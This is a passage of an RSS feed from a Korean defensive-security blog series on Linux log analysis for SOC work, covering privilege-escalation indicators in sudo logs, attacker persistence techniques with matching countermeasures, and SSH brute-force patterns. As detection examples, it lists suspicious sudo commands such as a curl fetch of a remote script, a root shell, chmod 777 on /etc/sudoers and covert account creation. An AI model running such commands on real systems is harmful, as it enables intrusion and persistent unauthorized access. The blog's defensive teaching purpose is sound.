&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;3. auditd&lt;/b&gt; - `&lt;span style=&quot;color: #781b33;&quot;&gt;curl&lt;/span&gt;`로 파일 다운로드&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;4. auditd&lt;/b&gt; - `&lt;span style=&quot;color: #781b33;&quot;&gt;chmod&lt;/span&gt;` + 실행&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;5. cron&lt;/b&gt; - 지속 실행 확보&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #781b33;&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;6. network&lt;/b&gt; - 외부 C2 연결&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[Blue Team] EP.10&amp;nbsp;-&amp;nbsp;프로세스&amp;nbsp;/&amp;nbsp;명령&amp;nbsp;/&amp;nbsp;파일&amp;nbsp;/&amp;nbsp;네트워크&amp;nbsp;분석.&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;END.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;</description>
      <category>Blue Team (SOC)/Linux Log Analysis</category>
      <category>Blue Team</category>
      <category>Cyber Security</category>
      <category>linux</category>
      <category>linux log</category>
      <category>SoC</category>
      <category>보안 관제</category>
      <category>정보보안</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/72</guid>
      <comments>https://anbymata.tistory.com/72#entry72comment</comments>
      <pubDate>Fri, 1 May 2026 22:00:32 +0900</pubDate>
    </item>
    <item>
      <title>[Blue Team] EP.9 - 권한 상승 분석</title>
      <link>https://anbymata.tistory.com/71</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[9-1] 로그인 직후 권한 상승을 시도하는 이유&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;일반 사용자 권한의 제한&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;시스템 설정 불가&lt;/b&gt; - 핵심 설정 파일을 수정해 백도어를 심는 보안 기능 무력화 행위 불가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;접근 제한&lt;/b&gt; - 다른 사용자의 데이터나 민감한 시스템 파일 접근 불가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;서비스 제어 제한&lt;/b&gt; - 새로운 악성 서비스 설치 및 기존 보안 서비스 중지 불가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;흔적 은폐 불가&lt;/b&gt; - 시스템의 Audit Log(감사 로그)를 임의로 변경 및 삭제 불가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;root(관리자) 권한으로 가능한 것들&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;자유로운 파일 조작&lt;/b&gt; - 시스템 내 모든 파일 조작 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;커널 및 서비스 장악&lt;/b&gt; - 커널 모듈을 로드하여 탐지가 힘든 루트킷 설치 및 서비스 조작 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;계정 관리&lt;/b&gt; - 새로운 관리자 계정 생성 및 sudoers 파일을 변경해 권한 고착화 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;네트워크 제어&lt;/b&gt; - 방화벽 설정을 조작해 외부와의 연결 통로 확보 및 네트워크 통신 감시&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;로그 삭제&lt;/b&gt; - 모든 Audit Log(감사 로그) 삭제 및 조작을 통해 흔적 삭제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[9-2] sudo 로그&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignLeft&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;797&quot; data-origin-height=&quot;77&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/FVX4Y/dJMcacv5gRu/ZnMuSNmrt8NLA2w3fhi2Y1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/FVX4Y/dJMcacv5gRu/ZnMuSNmrt8NLA2w3fhi2Y1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/FVX4Y/dJMcacv5gRu/ZnMuSNmrt8NLA2w3fhi2Y1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FFVX4Y%2FdJMcacv5gRu%2FZnMuSNmrt8NLA2w3fhi2Y1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;797&quot; height=&quot;77&quot; data-origin-width=&quot;797&quot; data-origin-height=&quot;77&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;[sudo 로그 구성 요소]&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 실행자 (&lt;span style=&quot;color: #ee2323;&quot;&gt;anbymata&lt;/span&gt;):&lt;/b&gt; 명령을 입력한 사용자 계정&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 터미널 (TTY=&lt;span style=&quot;color: #006dd7;&quot;&gt;pts/0&lt;/span&gt;):&lt;/b&gt; 원격 SSH 세션을 통해 접속 중&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 작업 경로 (PWD=&lt;span style=&quot;color: #8a3db6;&quot;&gt;/home/main/policy&lt;/span&gt;):&lt;/b&gt; 해당 명령이 실행된 현재 디렉토리 위치&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 목표 권한 (USER=&lt;span style=&quot;color: #f89009;&quot;&gt;root&lt;/span&gt;):&lt;/b&gt; 명령이 실행될 때 빌려온 대상 권한 (주로 root)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;- 실행 명령 (COMMAND=&lt;span style=&quot;color: #009a87;&quot;&gt;/usr/bin/apt update&lt;/span&gt;):&lt;/b&gt; 실제로 수행된 최종 행위&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;정상 명령들&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;b&gt;COMMAND=&lt;span style=&quot;color: #5733b1;&quot;&gt;/usr/bin/apt update&lt;/span&gt;&lt;/b&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;b&gt;COMMAND=&lt;span style=&quot;color: #5733b1;&quot;&gt;/usr/bin/systemctl restart nginx&lt;/span&gt;&lt;/b&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;b&gt;COMMAND=&lt;span style=&quot;color: #5733b1;&quot;&gt;/usr/bin/tail -n 100 /var/log/nginx/error.log&lt;/span&gt;&lt;/b&gt;`&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 정기적인 패치나 사전에 승인된 서비스 관리 작업&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;주의 명령들&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;b&gt;COMMAND=&lt;span style=&quot;color: #5733b1;&quot;&gt;/usr/sbin/useradd -m backupavc&lt;/span&gt;`&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 미승인 관리자 계정 생성 시도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;b&gt;COMMAND=&lt;span style=&quot;color: #5733b1;&quot;&gt;/bin/bash&lt;/span&gt;`&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; root 쉘 직접 획득 (가장 위험)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;b&gt;COMMAND=&lt;span style=&quot;color: #5733b1;&quot;&gt;/bin/chmod 777 /etc/sudoers`&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 권한 체계 무력화 및 고착화 시도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- `&lt;b&gt;COMMAND=&lt;span style=&quot;color: #5733b1;&quot;&gt;/bin/curl -faSL https://.../a.sh&lt;/span&gt;`&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;rarr; 외부에서 악성 스크립트를 다운로드하여 즉시 실행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[9-3] 다른 권한 전환 경로&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;`su` (Switch User)&lt;/b&gt; - 세션 전환의 기본&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 다른 사용자로 세션을 완전히 전환하는 방식&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 주로 `&lt;b&gt;su -&lt;/b&gt;`를 통해 환경 변수까지 root로 전환&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 실행 시 대상 계정의 비밀번호 필요&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 로그는 주로 `&lt;b&gt;/var/log/auth.log&lt;/b&gt;` 또는 `&lt;b&gt;/var/log/secure&lt;/b&gt;`에 기록됨&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 성공 시 &quot;session opened for user root&quot;와 같은 메시지 남음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;`pkexec` (PolicyKit)&lt;/b&gt; - GUI 취약점&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- Desktop/GUI 환경에서 주로 사용되는 PolicyKit 기반의 권한 실행 도구&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 취약점 악용 시 일반적인 &lt;b&gt;auth.log&lt;/b&gt; 에 기록되지 않을 수 있음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- auditd 나 EDR을 통한 보강이 필요&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;`auditd`&lt;/b&gt; 보강 - 커널 수준의 강력한 감시&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;evecve&lt;/b&gt; 시스템 콜을 추적해 명령 실행 인자를 모두 기록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 사용자의 실제 ID (&lt;b&gt;auid&lt;/b&gt;)와 유효 ID (&lt;b&gt;euid&lt;/b&gt;)의 변화를 실시간으로 기록해 로그 삭제 및 우회가 어려움&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[9-4] Persistence(지속성 유지) 및 구조적 권한 고착화 전략&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;공격자가 &lt;b&gt;root&lt;/b&gt; 쉘을 얻은 후, 언제든 재진입할 수 있도록 수행하는 전략&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. 새 계정 생성과 그룹 추가&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 정상 계정처럼 위장한 새로운 관리자 계정을 몰래 생성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&amp;nbsp;- 대응 방법:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; + 계정 생성 직후 외부 IP에서 해당 계정으로의 로그인 성공(Accepted password)이 발생&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; + `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;useradd&lt;/b&gt;&lt;/span&gt;` 로그 - 새로운 사용자가 생성된 시점과 승인 이력 대조&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; + `&lt;span style=&quot;color: #5733b1;&quot;&gt;&lt;b&gt;usermod&lt;/b&gt;&lt;/span&gt;` 로그 - 생성된 계정이 즉시 &lt;b&gt;sudo&lt;/b&gt;나 &lt;b&gt;wheel&lt;/b&gt; 같은 관리자 그룹에 추가되는지 감시&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. sudoers 변경과 `&lt;span style=&quot;color: #5733b1;&quot;&gt;etc/sudoers.d&lt;/span&gt;` 조작&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 비밀번호 없이 관리자 권한 사용을 위해 권한 체계를 구조적으로 변조&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- `&lt;b&gt;NOPASSWD:ALL&lt;/b&gt;` 설정은 특정 계정이 비밀번호 없이 모든 명령을 root 권한으로 실행할 수 있게 함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&amp;nbsp;- 대응 방법:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; + &lt;b&gt;visudo&lt;/b&gt; 실행 흔적이나 `&lt;b&gt;/etc/sudoers.d/&lt;/b&gt;` 경로에 새 파일 생성 여부 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; + 파일 &lt;b&gt;mtime&lt;/b&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(수정 시간)&lt;/span&gt;을 체크하여 미승인 시점에 변경되었는지 확인&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3. SSH 키 기반 지속성: authorized_keys 추가&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- SSH 공개키가 남아있으면 계정의 비밀번호가 바뀌어도 다시 들어올 수 있음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;auth.log&lt;/b&gt; 에는 &quot;Accepted publickey&quot;라는 성공 로그만 남아 정상 사용자와 구분이 힘듬&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&amp;nbsp;- 대응 방법:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; + &lt;b&gt;auditd watch&lt;/b&gt; 설정을 통해 `&lt;span style=&quot;color: #333333;&quot;&gt;&lt;b&gt;.ssh/authorized_keys&lt;/b&gt;&lt;/span&gt;`파일의 쓰기 행위를 실시간 감시&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; + 침해 대응 시&lt;b&gt;&amp;nbsp;root, deploy, devops&lt;/b&gt; 등 주요 계정의 키 파일을 점검&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4. cron, systemd를 통한 주기적 지속성&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 시스템이 재부팅되어도 주기적으로 살아나는 구조&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;cron&lt;/b&gt; - 외부 URL에서 악성 스크립트를 받아 쉘로 실행하는 명령을 등록&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;b&gt;systemd&lt;/b&gt; - 정상 서비스로 위장한 유닛 파일을 생성하여 악성 파일을 자동 실행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&amp;nbsp;- 대응 방법:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; + 실행 대상 파일의 경로 ( /tmp, /dev/shm...)와 등록 주체 (&lt;b&gt;root&lt;/b&gt;)를 함께 분석&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[Blue Team] EP.9 - 권한 상승 분석. &lt;span style=&quot;color: #ee2323;&quot;&gt;END.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;</description>
      <category>Blue Team (SOC)/Linux Log Analysis</category>
      <category>Blue Team</category>
      <category>cert</category>
      <category>Cyber Security</category>
      <category>IR</category>
      <category>linux</category>
      <category>log</category>
      <category>SoC</category>
      <category>보안 관제</category>
      <category>정보보안</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/71</guid>
      <comments>https://anbymata.tistory.com/71#entry71comment</comments>
      <pubDate>Fri, 24 Apr 2026 22:00:55 +0900</pubDate>
    </item>
    <item>
      <title>[Blue Team] EP.8 - 로그인 및 인증 로그 분석</title>
      <link>https://anbymata.tistory.com/70</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[8-1] SSH 실패 vs SSH 성공&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;이상 패턴 (Red Flags)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;Brute Force&lt;/b&gt; = 단시간에 다수의 실패 후 로그인 성공&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;Scanning&lt;/b&gt; = 존재하지 않는 계정을 포함한 다양한 계정명 시도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;Post-Exploitation&lt;/b&gt; = 로그인 직후 sudo, 파일 다운도르, 지속성 확보 행위&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;SSH 실패 로그&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignLeft&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;835&quot; data-origin-height=&quot;85&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dcYjkA/dJMcabRrh3Y/6o95b8FIIDLkKrCLXSfAW0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dcYjkA/dJMcabRrh3Y/6o95b8FIIDLkKrCLXSfAW0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dcYjkA/dJMcabRrh3Y/6o95b8FIIDLkKrCLXSfAW0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdcYjkA%2FdJMcabRrh3Y%2F6o95b8FIIDLkKrCLXSfAW0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;835&quot; height=&quot;85&quot; data-origin-width=&quot;835&quot; data-origin-height=&quot;85&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;invalid user&lt;/b&gt; = 시스템에 존재하니 않는 계정으로 접속 시도 &amp;rarr; 자동화된 스캔 도구에 의한 목록 기반 공격 가능성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;출발지 IP&lt;/b&gt; = 외부 IP에서 직접 시도되는 &lt;b&gt;invalid user&lt;/b&gt; 접근 &amp;rarr; 100% 차단 및 모니터링 대상&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;SSH 성공 로그&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignLeft&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;781&quot; data-origin-height=&quot;77&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/w4r2X/dJMcabKIPol/8DYYwvhr7nQJgbklX2STlk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/w4r2X/dJMcabKIPol/8DYYwvhr7nQJgbklX2STlk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/w4r2X/dJMcabKIPol/8DYYwvhr7nQJgbklX2STlk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fw4r2X%2FdJMcabKIPol%2F8DYYwvhr7nQJgbklX2STlk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;781&quot; height=&quot;77&quot; data-origin-width=&quot;781&quot; data-origin-height=&quot;77&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;password&lt;/b&gt; = 탈취 위험이 상대적으로 높은 인증 방식 &amp;rarr; 실패 횟수가 많다면 계정 탈취 가능성이 높음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;publickey&lt;/b&gt; = 비교적 안전한 인증 방식&amp;nbsp; &amp;rarr; 탈취된 키의 악용이나&lt;b&gt; authorized_keys&lt;/b&gt; 파일의 변조 여부 확인 필요&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[8-2] 운영 오류들&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Brute Force (무차별 대입 공격)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 특정 계정의 비밀번호를 알아내기 위해 모든 조합을 시도하는 방식&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;= 한 계정 + 다수 비밀번호&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignLeft&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;357&quot; data-origin-height=&quot;205&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/S959M/dJMcahYqDtc/wvIJKCAMEkyUiigh5r2NLk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/S959M/dJMcahYqDtc/wvIJKCAMEkyUiigh5r2NLk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/S959M/dJMcahYqDtc/wvIJKCAMEkyUiigh5r2NLk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FS959M%2FdJMcahYqDtc%2FwvIJKCAMEkyUiigh5r2NLk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;357&quot; height=&quot;205&quot; data-origin-width=&quot;357&quot; data-origin-height=&quot;205&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;b&gt;root&lt;/b&gt; 와 같은 특정 대상 계정에 대해 짧은 시간 동안 수백 번 이상의 실패 로그 발생&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 출발지 IP가 소수이고, 특정 계정 하나만을 집요하게 노림&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;Password Spraying (패스워드 스프레이 공격)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 보안 정책 회피를 위해, 흔히 사용되는 비밀번호 몇 개를 수많은 계정에 대입해보는 방식&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;= 다수 계정 + 소수 비밀번호&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignLeft&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;455&quot; data-origin-height=&quot;196&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bHctU2/dJMcaipvZ0g/jpZhjsn0vcOVkqHKeFhrl1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bHctU2/dJMcaipvZ0g/jpZhjsn0vcOVkqHKeFhrl1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bHctU2/dJMcaipvZ0g/jpZhjsn0vcOVkqHKeFhrl1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbHctU2%2FdJMcaipvZ0g%2FjpZhjsn0vcOVkqHKeFhrl1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; 